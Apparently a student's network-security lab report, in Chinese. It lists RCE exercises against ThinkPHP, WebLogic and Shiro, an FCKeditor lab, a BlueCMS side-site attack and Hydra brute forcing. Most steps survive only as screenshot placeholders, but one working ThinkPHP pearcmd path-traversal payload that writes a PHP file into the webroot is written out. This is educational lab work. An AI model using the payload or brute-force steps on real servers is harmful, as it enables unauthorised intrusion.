11.9

雷子暑假结束發表於2024-11-14

@所有人 網路安全C10-2024.11.9

作業:

  1. RCE:分別實現ThinkPHP、Weblogic、Shiro漏洞的利用過程

ThinkPHP

?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?

=phpinfo()?>+/var/www/html/magedu1.php

11.9

Weblogic

方式1

11.9

11.9

方式2

11.9

11.9

Shiro漏洞

CVE-2016-4437

工具1

11.9

工具2

11.9

11.9

CVE-2020-1957

11.9

  1. FCKeditor編輯器漏洞實驗;

11.9

  1. bluecms旁註漏洞,並解釋為什麼旁站攻擊可以拿下主站?跨庫的意思是什麼?

11.9

11.9

11.9

11.9

旁站攻擊可以拿下主站原因:旁站與主站的服務部署在同一伺服器上,當拿下旁站時,可以透過資料庫等其他手段getshell,等於拿下主站

跨庫的意思是什麼:在同一伺服器中,資料庫管理系統是共享的,當拿下其中一埠所對應的web服務時,可以透過運算元據庫從而實現sql跨庫查詢來獲取其他資料庫檔案資訊

4、暴力猜解:hydra實現對ftp、ssh、rdp、mysql的暴力破解。

ftp

11.9

Ssh

11.9

rdp遠端桌面

11.9

mysql

11.9